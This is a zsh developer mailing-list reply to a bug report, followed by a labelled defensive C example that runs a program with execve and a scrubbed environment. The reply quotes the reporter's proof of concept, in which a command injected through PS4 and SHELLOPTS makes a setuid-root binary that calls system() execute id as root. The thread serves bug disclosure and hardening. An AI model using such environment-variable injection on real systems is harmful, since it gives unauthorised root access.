Zsh Mailing List Archive
Re: BUG: crafting SHELLOPTS and PS4 allows to run arbitrary programs in setuid binaries using system
- X-seq: zsh-workers 39457
- From: Daniel Shahaf <d.s@xxxxxxxxxxxxxxxxxx>
- To: Mateusz Lenik <mlen@xxxxxxx>
- Subject: Re: BUG: crafting SHELLOPTS and PS4 allows to run arbitrary programs in setuid binaries using system
- Date: Tue, 27 Sep 2016 07:53:47 +0000
- Cc: zsh-workers@xxxxxxx
- In-reply-to: <CALDAOts+rgsuZfABkgVBphvY4CLcUiMLFA4xR0bUXPNxnhcHug@mail.gmail.com>
- List-help: <mailto:zsh-workers-help@zsh.org>
- List-id: Zsh Workers List <zsh-workers.zsh.org>
- List-post: <mailto:zsh-workers@zsh.org>
- Mailing-list: contact zsh-workers-help@xxxxxxx; run by ezmlm
- References: <CALDAOts+rgsuZfABkgVBphvY4CLcUiMLFA4xR0bUXPNxnhcHug@mail.gmail.com>
Mateusz Lenik wrote on Tue, Sep 27, 2016 at 06:59:18 +0000:
> % gcc -xc - -otest <<< 'int main() { setuid(0); system("/bin/date"); }'
> % sudo chown root:root test
> % sudo chmod 4755 test
> % env -i SHELLOPTS=xtrace PS4='$(id)' ./test
> uid=0(root) gid=... groups=.../bin/date
> Tue Sep 27 08:49:16 CEST 2016
I can't reproduce that in either 5.0.7 or latest master, even with
«setopt promptsubst» in effect.  (Does it reproduce in 'zsh -f'?)
> % zsh --version
> 
> zsh 5.2 (x86_64-pc-linux-gnu)
> %
> 
> The solution that bash folks implemented is to drop PS4 from env when the
> shell is run as root.
34015 (89012cf94ca) stopped importing non-ASCII envvars.  There may have
been other changes in this area but I couldn't quickly find them.
Thanks for the report,
Daniel
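
A defensive counterpart to the quoted test program, as an added example that is not part of this thread and not code from zsh or bash: a privileged helper that runs `/bin/date` with `execve` instead of `system()` and hands the child an allowlisted environment, so `SHELLOPTS` and `PS4` never reach a shell. The names `scrub_env` and `run_date`, the allowlist (`TZ`, `LANG`) and the fixed `PATH` are assumptions made for the illustration.

```c
/* Added example, not from the thread: no system(), allowlisted environment. */
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#define MAX_ENV 8
extern char **environ;
/* Assumption: the only inherited variables the child needs. */
static const char *const keep[] = { "TZ", "LANG", NULL };

/* Return 1 if "NAME=value" has an allowlisted NAME (exact match). */
static int allowed(const char *entry)
{
    for (size_t i = 0; keep[i]; i++) {
        size_t n = strlen(keep[i]);
        if (strncmp(entry, keep[i], n) == 0 && entry[n] == '=')
            return 1;
    }
    return 0;
}

/* Fill out[] with a fixed PATH plus allowlisted entries of in[];
 * SHELLOPTS, PS4 and anything else unlisted is dropped. Returns count. */
int scrub_env(char *const in[], char *out[MAX_ENV])
{
    int n = 0;
    out[n++] = "PATH=/usr/bin:/bin";
    for (size_t i = 0; in && in[i] && n < MAX_ENV - 1; i++)
        if (allowed(in[i]))
            out[n++] = in[i];
    out[n] = NULL;
    return n;
}

/* Run /bin/date directly, with no shell; returns exit status or -1. */
int run_date(char *const inherited[])
{
    char *env[MAX_ENV];
    char *const argv[] = { "date", NULL };
    int status;
    scrub_env(inherited, env);
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) { execve("/bin/date", argv, env); _exit(127); }
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
int main(void) { return run_date(environ); }
```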